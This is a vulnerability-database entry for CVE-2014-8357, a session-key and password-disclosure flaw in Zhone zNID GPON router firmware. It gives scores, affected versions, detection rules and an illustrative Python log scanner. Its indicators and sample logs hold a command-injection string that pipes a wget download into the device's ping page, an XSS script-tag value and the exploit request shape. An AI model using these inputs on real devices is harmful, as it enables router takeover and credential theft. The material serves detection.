cbcvebase.
CVE-2014-8357
published 2017-10-17


Priority P273 high · 8.8 CVSS 3.0
AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 5.44% (91.7th percentile)
backupsettings.html in the web administrative portal in Zhone zNID GPON 2426A before S3.0.501 places a session key in a URL, which allows remote attackers to obtain arbitrary user passwords via the sessionKey parameter in a getConfig action to backupsettings.conf.

Affected

1 range
Vendor: dasanzhone
Product: znid_2426a_firmware
Version range: < s3.0.501
Fixed in: s3.0.501

Detection & IOCs (extracted from sources)

url: http://<host>/backupsettings.conf?action=getConfig&sessionKey=<sessionKey>
path: /backupsettings.conf
path: /backupsettings.html
path: /menuBcm.js
path: /uploadsettings.cgi
path: /zhnsystemconfig.cgi
filename: backupsettings.conf
command: /zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3
  • Detect GET requests to /backupsettings.conf with 'action=getConfig' and a 'sessionKey' parameter — this is the core exploit path for CVE-2014-8357 password disclosure.
  • Monitor for the sessionKey parameter appearing in HTTP request URLs (not just POST bodies), indicating session token leakage via Referer or logs.
  • Detect command injection attempts via the 'ipAddr' parameter in requests to /zhnping.cmd, particularly pipe characters followed by OS commands (e.g., '|wget').
  • Alert on POST requests to /uploadsettings.cgi with multipart/form-data containing a file named 'backupsettings.conf', which can be used to overwrite admin credentials.
  • Detect access to /menuBcm.js followed by manipulation of its response (e.g., via proxy interception replacing 'admin' with a low-privilege username) as an indicator of privilege escalation (CVE-2014-8356).
  • Detect stored XSS payloads in GET requests to /zhnsystemconfig.cgi via the snmpSysName, snmpSysLocation, or snmpSysContact parameters (e.g., presence of '<script>' tags).
  • Passwords in the backup configuration file are Base64-encoded, not encrypted; any attacker retrieving backupsettings.conf can trivially decode all credentials.
  • Access control on the Zhone web portal is enforced client-side via JavaScript only; server-side authorization is absent, meaning any authenticated low-privilege user can reach admin functions by manipulating JS responses.
  • The vulnerability affects Zhone zNID GPON 2426A firmware before S3.0.501; the exploit-db advisory recommends upgrading to S3.1.241 for full remediation of all reported issues.
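
The URL-based detections listed above can be run over web access logs. The following is an added example, not code from this page or its sources; it assumes common-log-format lines from a proxy or sensor in front of the device, and the rule names, `classify` function and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (documentation IP ranges, made-up session keys).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /backupsettings.conf?action=getConfig&sessionKey=123456789 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /zhnping.cmd?&test=traceroute&sessionKey=123456789&ipAddr=192.0.2.1|wget%20http://198.51.100.7/x&ttl=30 HTTP/1.1" 200 310',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "POST /uploadsettings.cgi HTTP/1.1" 200 98',
    '192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /zhnsystemconfig.cgi?snmpSysName=%3Cscript%3Ealert(1)%3C/script%3E&sessionKey=123456789 HTTP/1.1" 200 77',
    '192.0.2.20 - - [01/Jan/2024:10:01:00 +0000] "GET /zhnping.cmd?&test=ping&ipAddr=192.0.2.1 HTTP/1.1" 200 120',
    '192.0.2.20 - - [01/Jan/2024:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SHELL_META = re.compile(r'[|;&`$]')  # checked after URL decoding
SNMP_FIELDS = ("snmpSysName", "snmpSysLocation", "snmpSysContact")

def classify(line):
    """Return the sorted rule names that one access-log line triggers."""
    m = REQUEST.search(line)
    if not m:
        return []
    method, url = m["method"], urlsplit(m["target"])
    query = parse_qs(url.query)  # parameter values come back URL-decoded
    hits = set()
    if "sessionKey" in query:  # session token exposed in the URL itself
        hits.add("session_key_in_url")
    if (method == "GET" and url.path == "/backupsettings.conf"
            and "getConfig" in query.get("action", []) and "sessionKey" in query):
        hits.add("backup_config_fetch")  # CVE-2014-8357 request shape
    if url.path == "/zhnping.cmd" and any(
            SHELL_META.search(v) for v in query.get("ipAddr", [])):
        hits.add("zhnping_command_injection")
    if method == "POST" and url.path == "/uploadsettings.cgi":
        # The multipart body (backupsettings.conf) is not visible in access logs.
        hits.add("settings_upload")
    if url.path == "/zhnsystemconfig.cgi" and any(
            "<script" in v.lower() for f in SNMP_FIELDS for v in query.get(f, [])):
        hits.add("snmp_field_script_tag")
    return sorted(hits)

def scan(lines):
    """Map line index -> triggered rules, skipping lines with no hits."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_LOG).items():
        print(idx, rules)
```

The `settings_upload` rule only flags the request for review; confirming the uploaded filename needs body inspection at a proxy or WAF.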

CVSS provenance

nvd · v3.0 · 8.8 HIGH · CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 4.0 MEDIUM · AV:N/AC:L/Au:S/C:P/I:N/A:N
vulncheck · 8.8 HIGH